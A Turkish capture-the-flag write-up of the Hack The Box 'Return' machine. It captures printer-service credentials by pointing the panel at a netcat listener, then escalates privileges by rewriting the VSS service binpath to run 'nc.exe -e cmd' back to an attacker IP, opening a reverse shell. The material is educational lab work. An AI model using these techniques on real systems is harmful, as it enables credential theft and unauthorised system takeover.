Hack The Box Return Makine Çözümü — shaggy
Açıklama: Selam arkadaşlar, Hack the Box platformunda bulunan** ‘Return’ **isimli **makinenin ** çözümünü sizinle paylaşıyor olacağım. Bu konuda Active Directory’de servislerin zararlıya kullanılması hakkında bilgileneceğiz. Çözmesi oldukça zevkli olan bu makineyi gelin çözmeye başlayalım. 🍾 🙌 🎉

Öncelikle ilgili sistem üzerinde çalışan port ve servislerin bilgilerini öğreniyoruz.

Sonrasında smb’lerden ek bilgi edinmek üzere bakınıyoruz.

Ardından sistem üzerinde bulunan web uygulamasına gittiğimizde bizi yazıcı arayüzü karşılamakta olduğunu görüyoruz.

Burada isteği kontrol ederken uygulamanın sadece ip fonksiyonunu gönderdiğini gördük.

Bunun üzerine kendi ip’mizi siteme verdiğimizde ve nc ile dinlediğimizde bize parola verdiğini gördük.


Gerekli credentialları elde ettiğimiz üzere sisteme bağlantı sağlayabiliriz.Bunun üzerinde svc-printer kullanıcısının Desktop dizinine gidip user.txt’yi alabiliriz.

Privilege escalation’a başlamadan önce kullanıcımızın hangi ayrıcalıklara sahip olduğumu öğrenelim.

Sonrasında sistem üzerinde çalışan servisleri kontrol edelim. Burada VSS hizmetinin açık olduğunu fark ediyoruz.
1*Evil-WinRM* PS C:\Users\svc-printer\desktop> servicesPath Privileges Service ---- ---------- ------- C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharingC:\Windows\SysWow64\perfhost.exe True PerfHost "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools "C:\WINDOWS\system32\vssvc.exe" True VSS "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend "C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvcSistem üzerine netcat yüklüyoruz.

Ardından VSS servisini kendi belirlediğimiz nc adresinden dinleyerek yönlendiriyoruz. Burada sadece yönlendirmemiz yetmiyor servisi durdurup tekrardan aktif etmemiz gerekiyor.
sc.exe config VSS binpath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.13 443"

Sonrasında sisteme verdiğimiz porttan Shell’imiz geliyor ve burada dikkat edilmesi gereken bir diğer husus ise 40 saniye gibi bir sürede servisin aktif olması. Sonrasında servis duracaktır. Bunun üzerinde root.txt’yi almak için 40 saniye gibi bir zaman diliminiz mevcut. :D

Okuduğunuz için teşekkürler, iyi çalışmalar dilerim. :)